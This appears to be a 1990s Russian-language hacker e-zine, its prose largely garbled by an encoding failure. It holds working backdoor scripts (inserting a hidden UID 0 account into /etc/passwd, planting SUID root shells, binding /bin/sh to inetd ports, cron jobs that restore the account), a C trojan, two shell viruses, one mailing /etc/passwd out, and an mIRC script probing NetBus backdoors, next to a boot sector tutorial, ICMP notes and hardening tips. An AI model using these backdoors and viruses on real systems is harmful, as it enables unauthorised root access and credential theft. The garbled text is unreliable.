$$$$$$

,g?$$$?` '$$$?g,$$$$$$?` '$$$?g,,g?$$$?` '$$$?g,

???????? $$$$$$ ?? $$$$$$$$$$$$ ?? $$$$$$$$$$$$ ?? $$$$$$ ??????

?? ..... $$$$$$ .. $$$$$$$$$$$$ .. $$$$$$$$$$$$ .. $$$$$$ ... ??

?? ::::: $$$$$$ :: $$$$$$$$$$$$ :: $$$$$$$$$$$$ :: $$$$$$ ::: ??

?? ::::: $$$$$$ :: ��$$$$$$ :: $$$$$$$$$$$$ :: $$$$$$ ::: ??

?? ::::: $$$$$$ :: $$$$$$$$$$$$ :: $$$$$$$$$$$$ ::........::: ??

?? ''''' $$$$$$ '' $$$$$$$$$$$$ '' $$$$$$$$$$$$ ''''''''''''' ??

???????? ``'''''??�$$$$$$�� ?? $$$$$$�� ????????????????

yy :''''''''' ??

?? : b u r n i n g C H R o m e

?? :.............. yy

?? ''''''''''''''' ??

?????????????????????

��

�� burn ��

�� burning chrome. �� - linux, �� -

��. � �� 90% ��

- �� . �� :(

�� - ��

�� . �� (�� :), � 2-� ��

(KOI-8 �� ). ��

�� iced mind �� legion of antichrists - �� :). �

�� - �� $@!�, � ��

�� . �� _��_ � �� - ��

�� xxl �� -�� , ��

�� - �� .

�� deathrai, �� icmp, �� group member,

�� - �� independent group pet ;)

�� - �� !

#########

BackDoors - �� ?

by trinitronic // burn

---

�� , �� , � �� ! ��

�� # �� !! �� :) ��

�� ? �� . ��, �� daemon9

�� .

�� :

1. �� uid/gid (�� 0, �� ). ��

�� , ��

��? :) �� . �� :)

#!/bin/csh

# Inserts a UID 0 account into the middle of the passwd file.

set linecount = `wc -l /etc/passwd`

cp /etc/passwd ./temppass

echo passwd file has $linecount[1] lines.

@ linecount[1] /= 2

@ linecount[1] += 1

echo Creating two files, $linecount[1] lines each $or approximately that$.

split -$linecount[1] ./temppass

echo ?EvilUser::0:0:Mr. Sinister:/home/sweet/home:/bin/csh? ?? ./xaa

cat ./xab ?? ./xaa

mv ./xaa /etc/passwd

chmod 644 /etc/passwd

rm ./xa* ./temppass

echo Done...

� �� - �� (� ��) ��.

2. �� SUID �� -�� (�� /tmp)

#!/bin/sh

# guess ;)

cp /bin/csh /tmp/.evilnaughtyshell

chmod 4755 /tmp/.evilnaughtyshell

� �� /tmp, �� /tmp ��

��. � �� , �� ,

�� SUID ��.

�� :

1. /etc/inetd �� tcp � udp, � ��

�� . �� /etc/inetd.conf �� (��

� �� linux � �� ), ��

��. �� - ��

daytime stream tcp nowait root internal

��

daytime stream tcp nowait /bin/sh sh -i.

� �� .

2. �� - �� ?��? � /etc/sevices:

evil 22/tcp evil

� �� /etc/inetd.conf:

evil stream tcp nowait /bin/sh sh -i

�� - �� , ��

2 :) � � �� - �� , ��, ��

��.

3. Cron - �� , �� , ��

� � �� - �� . ��

�� /etc/spool/cron/crontabs/root. ��

��:

0 0 * * 1 /usr/bin/updatedb

�� - ��/��. �� , ��, �� , � ��

��. �� :

0 0 * * * /usr/bin/trojancode

�� trojancode �� :

#!/bin/csh

# Is our eviluser still on the system? Let's make sure he is.

set evilflag = (`grep eviluser /etc/passwd`)

if($#evilflag == 0) then

set linecount = `wc -l /etc/passwd`

cp /etc/passwd ./temppass

@ linecount[1] /= 2

@ linecount[1] += 1

split -$linecount[1] ./temppass

echo ?EvilUser::0:0:Mr. Sinister:/home/sweet/home:/bin/csh? ?? ./xaa

cat ./xab ?? ./xaa

mv ./xaa /etc/passwd

chmod 644 /etc/passwd

rm ./xa* ./temppass

echo Done...

else

endif

4. �� . ��

�� -��

� 4 �� /etc/passwd. � �� , � ��

��! � � 4 �� ! :) ��. �� :

29 2 * * * /bin/usr/sneakysneaky_passwd

� �� :

#!/bin/csh

cp /etc/passwd /etc/.temppass

cp /var/spool/mail/.sneaky /etc/passwd

sleep 60

mv /etc/.temppass /etc/passwd

5. ��. �� 3 - �� :

/* A little trojan to create an SUID root shell, if the proper argument is

given. C code, rather than shell to hide obvious it's effects. */

#include

#define KEYWORD ?industry3?

#define BUFFERSIZE 10

int main(argc, argv)

int argc;

char *argv[];{

int i=0;

if(argv[1]){

if(!(strcmp(KEYWORD,argv[1]))){

/* This is the trojan part. */

system(?cp /bin/csh /bin/.swp121?);

system(?chown root /bin/.swp121?);

system(?chmod 4755 /bin/.swp121?);

}

printf(?Sychronizing bitmap image records.?); /* let's look like we're important */

/* system(?ls -alR / ?? /dev/null ? /dev/null??); */

for(;i?10;i++){

fprintf(stderr,?.?);

sleep(1);

}

printf(?\nDone.\n?);

return(0);

} /* End main */

6. �� . �� Linux/Unix ��

�� . �� su. � ��

�� - �� :

�� ;

�� = ?��?, ��

�� = ?�� ?, ��

�� . �� - ��

�� :)

K�� boot sector.

by seltorn // burn

----

�� boot �� - �� ,

�� . ��

�� assembler. � �� nasm,

�� :)

� bios �� boot �� - �� 512

�� (� �� 0x1FE)

�� 0xAA55. �� bios �� word � �� - �� .

boot �� , �� , � ��

��. ��

��, �� . bios �� boot ��

�� 0x7C00 � �� :

DL - �� .

CS - 0

IP - 0x7C00

�� [ORG 7C00h] �� :

mov ax, 0x7C0

mov ds, ax

mov es, ax

mov fs, ax

mov gs, ax

�� boot ��. �� boot

�� (DPMI ��) � ��

�� .

�� boot ��

rawrite, �� linux-��. �� boot

��, �� .

; simple boot sector tutorial (c) seltorn // burn security 1999

[BITS 16] ;bios �� 16bit realmode

[ORG 0] ;�� - 0

jmp start ;�� , �.�. ��

; data block

bootdrv db 0

bootmsg db ' -- burn yourself and burn your mom -- ', 13, 10, 0

rebootmsg db 'now push anything to get your brain burnt away', 13, 10, 0

processormsg db 'checking for some processor to burn', 13, 10, 0

need386 db 'hey! i want at least 386, damnit!', 13, 10, 0

found386 db 'argh. now we'll burn some damn 386+ processor', 13, 10, 0

whatever db 'put some brain burning code here', 13, 10, 0

; -- detect cpu --

detect_cpu;

mov si, processormsg ;��, ��

call message

; �� 88/86 ��

pushf ;��

xor ah,ah ;ah=0

push ax ;ax � ��

popf ;�� 12-15 �� - �� (��)

pushf ;��

pop ax

and ah, 0F0h

cmp ah, 0F0h ;�� 88-� :)

je no386 ;�� 386 :) �� 88/86

; �� 286 ��

mov ah, 0F0h ;�� 12-15

push ax ;ax � ��

popf

pushf ;�� ax

and ah, 0F0h ;��, ��

jz no386

popf ;��

mov si, found386

call message

ret

no386:

mov si, need386

call message

jmp reboot

; -- message --

message:

lodsb ;�� ds:si � al

or al, al ;�� 0

jz done ;��

mov ah, 0Eh ;��

mov bx, 0007 ;��

int 0x10 ;bios

jmp message

done: ret

; -- getkey --

getkey:

mov ah, 0 ;��

int 0x16

ret

; -- reboot --

reboot:

mov si, rebootmsg ;�� :)

call message

call getkey

db 0EAh

dw 0000h

dw 0FFFFh

; -- start --

start:

mov ax, 0x7C0 ;bios �� 0:07C00h, �� DS

mov ds, ax

mov [bootdrv], dl ;� �� ?

cli ;��

mov ax, 0x9000 ;��

mov ss, ax

mov sp, 0xFFFF ;��

sti ;�� :)

mov si, bootmsg ;��

call message

call detect_cpu

.386 ;�� 386 ��

mov si, whatever

call message

call getkey

call reboot

times 510-($-$$) db 0

dw 0xAA55

; --==--==--==--== � � � � � ==--==--==--==--

�� , �� :)

�� icmp �p��

by deathrai // independent

---

�� icmp - �� tcp/ip �p��.

�� ip-�� - �� :) � ��

� ��, �� p��. �� p�� icmp - internet control

message protocol.

�� p�� - ping. �� ping �� -

�� box, �� icmp �� echo request. �� , ��

�� echo reply.

�� icmp ��:

� ----------- � ----------------------- �

: h e a d e r : m e s s a g e d a t a :

� ----------- � ----------------------- �

�� 20 �� :) �� p��:

-------- � ---------- � ----------------- �

�� : �� : ��p�� :

-------- � ---------- � ----------------- �

�� - �� icmp ��, �� , �� .

�� 8 ��

�� - �� . �� 8 �� :)

��p��p �� 3 � �� 0 �� network unreachable. �� -

p��p �� 3 � �� 1 �� host unreachable. �.�. �� 3 - icmp ��, ��-

��p�� -�� 8)

p��p�� p�� p��p - �� ethernet �� -��

ping. �� tcpdump? :

00000000: 00 40 05 16 56 AA 00 00 b4 54 b1 BB 08 00 45 00

00000010: 00 54 54 ed 00 00 40 01 19 d9 d1 AA BB CC d1 BB

00000020: CC EE 08 00 67 74 41 2d 00 00 5a 9b 5b 36 ab 89

00000030: 03 00 08 09 0a 0b 0c 0d 0e 0f 10 11 12 13 14 15

00000040: 16 17 18 19 1a 1b 1c 1d 1e 1f 20 21 22 23 24 25

00000050: 26 27 28 29 2a 2b 2c 2d 2e 2f 30 31 32 33 34 35

00000060: 36 37

��p�� p�� p�� p��:

00000000: 00 40 05 16 56 AA 00 00 b4 54 b1 bb 08 00 -- --

�� p��

�� p�-

48 �� 48 ��

16 ��

�� ethernet, �� p�� source/destination hard-

ware. ��-�� p�� - 08 00 ��, �� ip-��.

�� 45 00 p��p�� :

4 - ��p�� internet protocol, � �� ipv4

5 - �� 32-� �� p�� word � ��

00 - �� p��

��p� �p�� :)

00000010: 00 54 54 ed 00 00 40 01 19 d9 d1 AA BB CC d1 BB

00000020: CC EE -- -- -- -- -- -- -- -- -- -- -- -- -- --

��p�� 16 �� - �� tcp ��p��. �� 16 �� p��p-

�� p�, �� 3 �� 13 �� p�� p��. �� -

8 ��, ��p�� p�� ?time to live? - �� , �� -

p�� p�� -

�� . �� ?hop? (�p�� p�� ) �� TTL �� 1. ��

ip �� (8 ��) - �� . 01 �� icmp �p��. �� 16

�� p�� .

�� 64 �� - �� p��, �� 32 �� .

� ��p� - �� icmp ��.

00000020: -- -- 08 00 67 74 41 2d 00 00 5a 9b 5b 36 ab 89

00000030: 03 00 08 09 0a 0b 0c 0d 0e 0f 10 11 12 13 14 15

00000040: 16 17 18 19 1a 1b 1c 1d 1e 1f 20 21 22 23 24 25

00000050: 26 27 28 29 2a 2b 2c 2d 2e 2f 30 31 32 33 34 35

00000060: 36 37

��p�� 8 �� - icmp ��. � �� 08 - echo request. �� - 8 ��

p�� 0. �� 16 �� p�� . �� 16 �� p� PID. �

�� p�� p�� p�� p��.

�� 16 �� sequence number - ��p �� . ��

��, �� p�� :) �� 56 �� p� (��

� �� p�� p��, �� p�� p�� p�� ).

�� Linux

by seltorn // burn

---

�� , �� linux � �� , �� .

�� - � ��, ��

�� . � �� , �� . � ��

�� 5 �� - � �� (� ��-��

�� ).

1. ��

� �� - �� .

�� , �� .

�� , �� , � ��

�� . �� - �� - � ��

�� .

��, �� , �� web/irc/ftp ��, ��

�� xwindows, � �� , ��

SLIP/PPP ��? :)

�� ?Installing Linux: 100 advices preventing from typical mistakes? -

�� , ��

��!!! :)

2. ��

�� , �� Reset

- � �� Linux �� ! � �� .

�� . �� - ��

�� .

�� -�� , �� . �

�� Linux-�� (Slackware �� Caldera) �� /etc/rc.d/.

�� . � ��, ��

�� . �� , �� , �� .

3. SUID-��.

�� , �� -�� - ��

SUID-��, � �� . �� ? ��, �� :

find / -perm 4000 ?? suid.txt

find / -perm 4700 ?? suid.txt

find / -perm 4777 ?? suid.txt

find / -perm 4770 ?? suid.txt

find / -perm 4755 ?? suid.txt

find / -perm 4750 ?? suid.txt

find / -perm 4751 ?? suid.txt

find / -perm 4500 ?? suid.txt

find / -perm 4555 ?? suid.txt

find / -perm 4550 ?? suid.txt

find / -perm 4551 ?? suid.txt

�� , �� , � �� . ��

�� , � �� 'chmod 000':

passwd

ping

traceroute

screen

�� - �� .

4. ��.

�� - �� !!! ��

�� ?�� ? � �� :) �� ,

�� . ��

�� .

�� /etc/rc.local ��:

# Quota support and file checks

if [ -x /usr/sbin/quotacheck ]

then

echo ?Checking quotas. This may take some time.?

/usr/sbin/quotacheck -avug

echo ? Done.?

# Turning ON quotas

if [ -x /usr/sbin/quotaon ]

then

echo ?Turning on quota.?

/usr/sbin/quotaon -avug

# Done

�� , ��

�� . �� -�� :

root@gammaray/admin/seltorn$ edquota tidepool

Quotas for user tidepool:

/dev/hda1: blocks in use: 279, limits (soft = 10000, hard = 15000)

inodes in use: 35, limits (soft = 1300, hard = 1500)

5. ��.

�� - �� log-

��. �� , �� ? ��

�� - �� , �� .

�� ? � �� /var/adm/ � /var/logs/ - �� , ��

��. � �� 2 �� , ?syslog? �

?messages?. �� -��, klogd � syslogd. klogd ��

� �� Linux �� , �� syslogd ��

��. �� /etc/rd.d/, �� . ��

�� ?/etc/syslof.conf?. �� , ��

�� :

# /etc/syslog.conf file

# for more information about this file, man `syslog.conf' or `sysklogd'

mail.none;*.=info;*.=notice /usr/adm/messages

*.=debug /usr/adm/debug

*.err /usr/adm/syslog

*.=alert root,seltorn

*.=emerg root,seltorn

authpriv.*;auth.* /admin/seltorn/auth.log

authpriv.*;auth.* /var/log/secure

mail.info;mail.notice /var/log/maillog

daemon.info;daemon.notice /var/log/daemon.log

*.* /dev/tty12

# EOF

�� messages �� ? �� , ��

�� , � ��

�� . �� -

�� .

�� (root) ��

�� (�� ) seltorn. ��

�� (�� auth) � �� , ��

�� , ��, �� .

�� . �� -�� , �� Ctrl-

F12 (� /dev/tty12 �� ) ��

�� . � �� console scrollback, �� 64

�� .

�� , �� - ��

��:

*.* @another.machine.ip.address

�� . �� /var/log/wtmp �

/var/log/utmp � �� shell histrory. �� . ��

�� -�� . Shell History �� , �.�. ��

�� . �� , ��

�� . �� , �� shell history � �� ?��?:

gcc smurf.c -o smurf

smurf 194.23.43.50

gcc octpuss.c -o octop

octop 194.23.43.50

ping 194.23.43.50

ping -s 2000 194.23.43.50

rm smurf*

rm oct*

rm .bash_history

rm .bash_hirtory

vi .bash_history

exit

logout

�� . �� Denial Of Service ��. ��

�� - ��

�� . �� Adduser �� :

# chattr users shell histories

if [ -d $HME ]; then

chmod 711 $HME

cd $HME

/bin/touch .bash_history

/bin/chown $LOGIN:users .bash_history

/usr/bin/chattr .bash_history

/bin/touch .ksh_history

/bin/chown $LOGIN:users .ksh_history

/usr/bin/chattr .ksh_history

/bin/touch .sh_history

/bin/chown $LOGIN:users .sh_history

/usr/bin/chattr .sh_history

�� , �� .

6. �� .

�� Linux-�. ��.

�� . �� , � ��

��:

/etc/suauth

/etc/ftpaccess

/etc/hosts.deny

/etc/hosts.allow

/etc/securetty

�� , suauth �� , � �� su. � ��

�� . �� :

TO:FROM:ACTION

TO - ��, � �� FROM. ACTION - ��,

�� . �� OWNPASS - �� root,

�� . �� DENY - �� su �� FROM. �� NOPASS -

�� . �� (� ��) �� man �� su � linux

slackware:

# A couple of privileged usernames may

# su to root with their own password.

root:chris,birddog:OWNPASS

# Anyone else may not su to root unless in

# group wheel. This is how BSD does things.

root:ALL EXCEPT GROUP wheel:DENY

# Perhaps terry and birddog are accounts

# owned by the same person.

# Access can be arranged between them

# with no password.

terry:birddog:NOPASS

birddog:terry:NOPASS

�� - ftpaccess. �� , �� ftp ��. ��

�� :), �� (�

�� ). �� man ftpaccess. ��

�� :

#deny these domains from getting on my FTP site

#deny host path to nasty message

deny *.lucky.net /etc/msgs/msg.pissoff

deny *.ukrpack.net /etc/msgs/msg.pissoff

deny *.microsoft.com /etc/msgs/msg.bill_is_asshole

�� hosts.deny � hosts.allow �� . �� TCP Wrapper-�,

��, �� . �� , ��

�� , �� internet-�� /etc/inetd.conf. ��

�� , �� (ftp, http, rsh, finger) �� tcpd

(tcp wrapper), �� , �� (��

��), �� , ��

�� . � �� /etc/inetd.conf ��

��-�� :

smtp stream tcp nowait root /usr/sbin/tcpd sendmail -bs

�� hosts.deny:

root@gammaray$ cat /etc/hosts.deny

ALL: 203.85.43.8

ALL: 194.115.56.57

�� ip-��. � ��

�� 3 (�� -�� ). �� ALL:ALL � ��

�� :)

�� , �� hosts.allow (�� )

�� , �� . �� :)

�� . /etc/securetty. �� ,

�� root. �� . ��

�� :

console

tty1

tty2

tty3

tty4

tty5

tty6

ttyS0

ttyS1

ttyS2

ttyS3

ttyp0

ttyp1

ttyp2

ttyp3

�� tty* � �� - ��, ttyp* � ttys* - ��. � ��

�� :

#Keep root from logging on with a remote /dev/tty

console

tty1

tty2

tty3

tty4

tty5

tty6

#ttyS0

#ttyS1

#ttyS2

#ttyS3

#ttyp0

#ttyp1

#ttyp2

#ttyp3

�� - �� . �� , ��

�� (�� , �� , ��

��, �� ). �� - �� ,

�� root-�� !!! :))) � ��, ��

�� - �� :))

7. �� .

�� , �� , ��

�� . �� :

/etc/inetd.conf

/etc/services

/etc/issue.net

/etc/issue

/etc/passwd

/etc/shadow

/etc/group

�� - �� inetd, �� . �

�� . ��

�� .

�� inetd.conf, �� (�� -�� ):

# The first 4 services are really only used for debugging purposes, so

# we comment them out since they can otherwise be used for some nasty

# denial-of-service attacks. If you need them, uncomment them.

echo stream tcp nowait root internal

echo dgram udp wait root internal

discard stream tcp nowait root internal

discard dgram udp wait root internal

daytime stream tcp nowait root internal

daytime dgram udp wait root internal

chargen stream tcp nowait root internal

chargen dgram udp wait root internal

time stream tcp nowait root internal

time dgram udp wait root internal

# These are standard services.

ftp stream tcp nowait root /usr/sbin/tcpd wu.ftpd -l -i -a

telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd

# Use this one instead if you want to snoop on telnet users (try to use

this

# for ethical purposes, ok folks?) :

# telnet stream tcp nowait root /usr/sbin/tcpd

/usr/sbin/in.telnetsnoopd

# This is generally unnecessary. The daemon provided by INN will handle

the

# incoming NNTP connections.

nntp stream tcp nowait root /usr/sbin/tcpd in.nntpd

smtp stream tcp nowait root /usr/sbin/tcpd sendmail -bs

# The comsat daemon notifies the user of new mail when biff is set to y:

comsat dgram udp wait root /usr/sbin/tcpd in.comsat

# Shell, login, exec and talk are BSD protocols.

shell stream tcp nowait root /usr/sbin/tcpd in.rshd -L

exec stream tcp nowait root /usr/sbin/tcpd in.rexecd

talk dgram udp wait root /usr/sbin/tcpd in.talkd

ntalk dgram udp wait root /usr/sbin/tcpd in.talkd

# Kerberos authenticated services

# klogin stream tcp nowait root /usr/sbin/tcpd rlogind -k

# eklogin stream tcp nowait root /usr/sbin/tcpd rlogind-k -x

# kshell stream tcp nowait root /usr/sbin/tcpd rshd -k

# Services run ONLY on the Kerberos server

# krbupdate stream tcp nowait root /usr/sbin/tcpd registerd

# kpasswd stream tcp nowait root /usr/sbin/tcpd kpasswdd

# Pop et al

pop2 stream tcp nowait root /usr/sbin/tcpd in.pop2d

pop3 stream tcp nowait root /usr/sbin/tcpd in.pop3d

# The ipop3d POP3 server is part of the Pine distribution. If you've

# installed the Pine package, you may wish to switch to ipop3d by

# commenting out the pop3 line above, and uncommenting the pop3 line

below.

pop3 stream tcp nowait root /usr/sbin/tcpd ipop3d

imap2 stream tcp nowait root /usr/sbin/tcpd imapd

# The Internet UUCP service.

uucp stream tcp nowait uucp /usr/sbin/tcpd /usr/lib/uucp/uucico-l

# Tftp service is provided primarily for booting. Most sites

# run this only on machines acting as ?boot servers.?

tftp dgram udp wait nobody /usr/sbin/tcpd in.tftpd

# bootps dgram udp wait root /usr/sbin/in.bootpd in.bootpd

# Finger, systat and netstat give out user information which may be

# valuable to potential ?system crackers.? Many sites choose to disable

# some or all of these services to improve security.

# Try ?telnet localhost systat? and ?telnet localhost netstat? to see

# that

# information yourself!

finger stream tcp nowait nobody /bin/sbin/tcpd in.fingerd

systat stream tcp nowait nobody /usr/sbin/tcpd /bin/ps -auwwx

netstat stream tcp nowait root /usr/sbin/tcpd /bin/netstat-a

# Ident service is used for net authentication

auth stream tcp wait root /usr/sbin/in.identd in.identd -w-t1 20 -l

# These are to start Samba, an smb server that can export filesystems to

# Pathworks, Lanmanager for DOS, Windows for Workgroups, Windows95,

#Lanmanager

# for Windows, Lanmanager for OS/2, Windows NT, etc.

# If you're running smbd and nmbd from daemons in /etc/rc.d/rc.samba,

#then you

# shouldn't uncomment these lines.

netbios-ssn stream tcp nowait root /usr/sbin/smbd smbd

netbios-ns dgram udp wait root /usr/sbin/nmbd nmbd

# Sun-RPC based services.

# ?service name/version? ?sock_type??rpc/prot??flags??user??server??args?

# rstatd/1-3 dgram rpc/udp wait root /usr/sbin/tcpd rpc.rstatd

# rusersd/2-3 dgram rpc/udp wait root /usr/sbin/tcpd rpc.rusersd

# walld/1 dgram rpc/udp wait root /usr/sbin/tcpd rpc.rwalld

# End of inetd.conf.

�� - �� , �� - �� :))

�� (�� ) �� :

time stream tcp nowait root internal

time dgram udp wait root internal

ftp stream tcp nowait root /usr/sbin/tcpd wu.ftpd -l -i -a

telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd

smtp stream tcp nowait root /usr/sbin/tcpd sendmail -bs

talk dgram udp wait root /usr/sbin/tcpd in.talkd

ntalk dgram udp wait root /usr/sbin/tcpd in.talkd

auth stream tcp wait root /usr/sbin/in.identd in.identd -w -t1 20 -l

� �� finger:

finger stream tcp nowait nobody /bin/cat cat /etc/finger.txt

� �� /etc/finger.txt ��, �� .

�� /etc/services �� . ��

��. �� , �� :

netstat 15/tcp

ftp 21/tcp

ssh 22/tcp #Secure SHell

telnet 23/tcp

smtp 25/tcp mail

time 37/tcp timserver

time 37/udp timserver

whois 43/tcp nicname

finger 79/tcp

www 80/tcp http # WorldWideWeb HTTP

www 80/udp # HyperText Transfer Protocol

auth 113/tcp tap ident authentication

talk 517/udp

ntalk 518/udp

/etc/issue � /etc/issue.net �� - �� . ��

�� :

Welcome to Linux 2.0.35.

gammaray login:_

�� :

welcome to nuclear missiles controlling system

running windows nt 2000

�� , ��

��.

�� - �� , ��

��.

8. ��

�� , ��

��. �� -�� 40-50% ��. �� - ��

security advisory �� , �� patch-�. ��

�� - �� :)

�� p�� p�� :)

by seltorn // burn

---

�� p��p��

��. ��-�� p��p ��p�p�� p: � �� p�

�� ? � �p��p�� 4-� �� CodeBreakers, �� p��p�� p��

�� p��. �� p�� p�� - � �� . �� Kamikazee

�� :)

1-� ��p�� - �� p��!!! :) �� p�� p�� SH � CSH,

�� p��/�� root � ��p�� p�� /��. ��

�� p�� p��.

2-� ��p�� p�� :) �� p� ��p�� (��

��p��), �� p�� :) �� ? �� p��,

�� :)

�� , ��p�� .

-- linux virus #1 starts here --

#/bin/csh

tail -n 22 ? .heh

csh .heh

if ($?crystal) then

cp $0 $HOME/.heh

chmod 700 $HOME

chown root $HOME/.heh

echo set crystal=1??$HOME/.login

cat $0 ?? $HOME/.login

echo crystal=1??$HOME/.profile

cat $0 ?? $HOME/.profile

chown root .login; chgrp root .login

chown root .profile; chgrp root .profile

chmod a-rw .login

chmod a-rw .profile

endif

cat /etc/passwd | seltorn@hell??/dev/null

exit

-- linux virus #1 ends here --

-- linux virus #2 starts here --

for file in *

if test -x $file

then

if test -w $file

then

if test -f $file

then

echo ???$file

cp $0 .tmp

echo '#' $fileX ??$file

fileX=$file

cat .tmp??$file

chmod a-wr $file

rm .tmp

fi ; fi ; fi

done

-- linux virus #2 ends here --

Detect Irc Netbus

by trinitronic // burn

---

�� - �� NetBus. �� :)

- ��

- �� - �� ip, �� igz

- �� , ��

� ��. ��

- �� /ip

- ��: �� , ��

-- �� --

1. �� (�� netbus.mrc):

on 1:join:#:{

sockclose s*

%s = $nick : $site

sockopen s $site 12345

}

on 1:sockopen:s:{

if ($sockerr ? 0) return

sockwrite -n s Password;1;xxy

sockwrite -n s ServerPwd;igz

msg $me netbus %s

}

on 1:sockopen:ts:{

if ($sockerr ? 0) return

sockwrite -n ts Password;1;xxx

sockwrite -n ts ServerPwd;igz

msg $me netbus %nukeip

}

2. �� aliases

/nuke {

set %nukehost $1

set %nukeip $2

/who %nukeip

sockclose ts

sockopen ts %nukeip 12345

if (%nukehost==0) {halt}

if (%nukehost==$null) {halt}

if (%nukehost) /who %nukehost

}

3. �� Perform on connect

/load -rs nbk.mrc

/IAL ON

4. �� advanced.

��!!!

�� p��

by trinitronic // burn

---

��p�� , �� p��

�� , �� p�� p�� , � ��p��

�� p��.

- Suid/sgid ��

�� p�� - ��, ��

�� , ��p�� p��

�� p��p�. H��p��p �� p��, ��

�� -�� p�� p�� (�� p��p� �

�� ). H� �� , �� ,

�� p�� p�� p��p��, ��

�� p�� root. �� p��p ��p�� suid:

-rwsr-xr-x 1 root root 44705 Jul 1 00:49 /usr/bin/passwd

�� /usr/bin/passwd, �� p��

�p��p�� uid/gid �� p��. ��

p�� p��p�� uid/gid ��.

�� p�� :

��p��p�� (�p�� p��, ��

�� :) � �� p� �� :))

- ��p��

�� ? �� p�� :

void main(int argc, char **argv, char **envp) {

char s[1024];

strcpy(s,getenv(?TERM?));

}

� ��p� �� :

$ export TERM=?01234567890123456789012345678901234567890123456789012345678

90123456789012345678901234567890123456789012345678901234567890123456789012

34567890123456789012345678901234567890123456789012345678901234567890123456

78901234567890123456789012345678901234567890123456789012345678901234567890

12345678901234567890123456789012345678901234567890123456789012345678901234

56789012345678901234567890123456789012345678901234567890123456789012345678